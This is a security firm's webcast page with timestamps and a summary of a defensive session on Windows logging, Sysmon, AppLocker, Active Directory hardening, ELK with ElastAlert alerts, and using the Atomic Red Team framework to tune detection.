Webcast: Let’s Talk About ELK Baby, Let’s Talk About You and AD

BHIS’ Defensery Driven Duo Delivers Another Delectable Transmission!

We know you are worried about your networks. After hours of discussion, we’ve come to the realization that some of our dedicated followers seem to be much more interested in catching malware than learning how to be (please forgive this next statement) “l33t hax0rs.”

Slides for this webcast can be found here: https://www.blackhillsinfosec.com/wp-content/uploads/2020/09/SLIDES_LetsTalkAboutELKBaby.pdf

2:47 – Why Are We Doing This?

5:07 – AT7: The Logs You Are Looking For

7:41 – AD Best Practices to Frustrate Attackers

9:37 – AT 5 – Complete Takedown & AT 6 – IOCs

12:04 – Blue Team-A-Palooza

14:22 – Windows Logging, Sysmon, and ELK – Part 1

16:45 – Implementing Sysmon and Applocker

21:45 – …And Group Policies That Kill Kill-Chains

22:31 – Here Are Some Important Blogs

23:35 – Summary Complete

25:28 – Introducing the Atomic Red Team

27:50 – Installing the Atomic Framework

29:29 – Squibbly Doo; The Results; Let’s Take A Step Back: The Atomic Tests; Another Step Back: WEF / Winlogbeat Config

33:41 – Executing T1015; Catching Executables; Executing T1003

42:02 – ElastAlert

43:21 – Now, On the ATT&CK

44:20 – Not Sure If That’s a Wrap Yet. (It’s Not)

47:11 – Check Out Our Dashboard

This webcast is going to demonstrate an integration between our ongoing Windows baseline best practices configuration and improving your endpoint optics. But first, we’re going to summarize some previous webcasts, their content, and the order in which they should be reviewed to tie all of these things together. Then, with all the baseline content and configuration options summarized, we are going to help you put a bow on all that, just in time for the Holidays.

The bright blue bow this year will help you set another New Year’s resolution:

  1. We all pledge to produce better and more effective logging that reduces time to detection.
  2. We can use open-source, well-documented solutions to do so!
  3. We can make the world a better place together!

With that said, we will be using an ELK installation that includes ElastAlert, designed by the folks at Yelp. This installation will ingest our workstation logs and demonstrate a base level of alerts that you too can quickly deploy in your environment. We may also have enough cycles to discuss the Security Onion project and how it has improved our overall network optics.

As a wrap-up, we will introduce the Atomic Red Team framework. This tool, if you haven’t seen or researched it before, can be used to rinse and repeat the refining process for your workstation and server detection mechanisms. Once deployed along with your logging infrastructure, this tool can help you fine-tune your alerting processes.



Want to learn more mad skills from the person who wrote this blog?

Check out these classes from Kent and Jordan:

Applied Purple Teaming

Defending the Enterprise

Available live/virtual and on-demand!